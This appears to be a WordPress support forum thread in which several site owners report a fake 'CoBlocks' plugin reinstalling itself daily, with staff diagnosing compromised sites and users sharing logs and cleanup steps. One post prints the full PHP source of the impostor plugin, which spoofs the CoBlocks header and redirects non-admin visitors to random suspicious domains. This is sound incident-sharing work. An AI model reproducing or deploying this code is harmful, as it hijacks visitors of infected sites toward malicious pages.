Plugin keeps installing itself and breaking my site

Hi Heather,

Thanks for bringing this to our attention. We do not have any measures within CoBlocks that allow for auto-installation, so we suggest reaching out to your hosting provider’s support channels first. The behaviors you are describing could be indicative of a malicious attack/malware posing as CoBlocks, and in order to be safe we recommend you reach out to your web hosting provider. If you have further questions feel free to let us know!

All the best,

Emile

The first time it broke my site I contacted my host. They were the ones who figured out that it was that plugin that had broken things. I specifically asked the tech if it was malware and he said that it did not appear to be malware. Scans by Malcare, Surcuri and Wordfence also don’t recognize it as malware.

Hi @lyricallanguage,

This sounds like a frustrating experience that you are going through. It also sounds like you are getting some mixed messages. If you are running malware scans, then that will make malicious actors far less likely. I can tell you with certainty that the CoBlocks plugin cannot install itself in any circumstance as I am very familiar with the codebase.

That being said it is feasible for the CoBlocks plugin to be installed programmatically by another plugin or application. What other plugins do you have running?

Best,

Anthony

I am having the exact same issue with a website I manage. Based on Sucuri logs, the WordPress login & password appear compromised. I’ve removed that user completely. Changed all passwords to WordPress, database, and hosting. I’ll know tonight if there’s still an issue.

The plugin itself had also been modified. I opened the file on the server and found the first few lines had been edited to something crazy. While activated, the plugin would force sexually explicit popups when normal links were clicked. Unfortunately, I removed it and didn’t save a copy.

Username changed for privacy. This is the log.

08:09
XXXX2019 Plugin activated: Page Builder Gutenberg Blocks – CoBlocks (v2.11.2; Builder/Builder.php)
IP: 192.0.87.146
08:09
XXXX2019 Post deleted: (multiple entries):
Post id: 2254
IP: 192.0.118.207
08:09
XXXX2019 Media file added; ID: 2254; name: Plugin; type: application/zip
IP: 192.0.118.207`

I am having exactly the same issue on my site. For the last three/four days it has installed itself every morning and it simply stops my site from loading at all. Sometimes it crashes the dashboard. I have spoken each time with my hosting provider, who keep removing it, yet it re-appears every day.

Malcare, Wordfence, and Sucuri do not flag it as malicious/malware. I have changed all of my passwords and enabled 2FA and somehow it keeps coming back.

If it helps, the plugins I am running are as follows:

Jetpack
Malcare
Wordfence
Sucuri
TablePress
TablePress DataTables ColumnFilter
Updraft
Yoast SEO

My theme is MH Magazine

Hi @amandacdev @jbrentnall,

Thank you for making additional reports about what you are experiencing. Thank you also for providing additional information regarding your anti-malware software and logs. Something alarming that I am seeing from your log is a file that is being called Builder/Builder.php. This is not something that we have anywhere in our code.

While I understand that the security plugins are not flagging malware the fact is that plugins cannot install themselves and this behavior is indicative of a compromised WordPress installation. I would advise each of you to proceed with the knowledge that what is occurring are almost certainly symptoms of a compromised site.

I would advise to follow the guide provided by WordPress here and consider implementing some or all of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Best,

Anthony

Hello,

I never installing your plugin but i have the same problem.

On my plugin folder, one time per day, a folder name is automatically create with a file name builder.php who create redirection to a malware page :

<?php
/*
Plugin Name: Page Builder Gutenberg Blocks – CoBlocks 
Plugin URI:  https://uk.www.ads-software.com/plugins/coblocks/
Description: CoBlocks is the most innovative collection of page building WordPress blocks for the new Gutenberg WordPress block editor.
Version:     2.11.2
Author:      GoDaddy
Author URI:  https://godaddy.com/
License:     GPL2
License URI: https://www.gnu.org/licenses/gpl-2.0.html
*/

function Page_Builder() {
	$KADM = current_user_can('manage_options');
	$hhh = $_SERVER['HTTP_REFERER'];
	$ALL_LIST = ['https://xn--80aa4ce2a.xn--p1ai','https://xn--80ad2akx.xn--p1ai','https://xn--j1amtse.xn--p1ai','https://xn--c1anqe5e.xn--p1ai','https://xn--80aj4ae6d.xn--p1ai','https://xn--h1aiml3a.xn--p1ai'];
	$url = "";
	if(!$KADM && !empty($hhh) && !replace_abc()){
		header("Location: ".$ALL_LIST[array_rand($ALL_LIST)]);
		exit();
	} else{}
}
function replace_abc() {
    return in_array($GLOBALS['pagenow'], array('wp-login.php', 'wp-register.php'));
}
add_action( 'wp_loaded', 'Page_Builder' );

?>

Can you help me …

Wow, good to know I’m not alone I guess. And thankfully mine is like jbrentnall and my site just simply does not load, which is much better I guess than loading sexually explicit images, eek!

Those of you also experiencing this issue, can I ask you all who your hosting company is? I’m with Bluehost, but from things I am seeing online am starting to question that choice.

Hi @monkeyf,

That code you have posted is malware. Assume your website is compromised and follow the instruction from my previous message.

Best,

Anthony

@lyricallanguage I am also with Bluehost.

I’m not sure if I’ve fixed it but I’ve followed the below steps and as of yet, nothing has come back. This might work for you.

1) Changed www.ads-software.com account password and enabled 2FA, making sure to Log me out on all devices. Done the same for WordPress.com.
2) In the Security section on my WordPress.com account I have disconnected all “Connected Apps”.
3) Change Bluehost password.
4) In my Sucuri logs, all installations were coming from various IPs beginning with 192.0 so I have added the following code into the htaccess file in the wp-admin folder “deny from 192.0”
5) Install the LoggedIn plugin and set the limit of active logins on the same account to 1.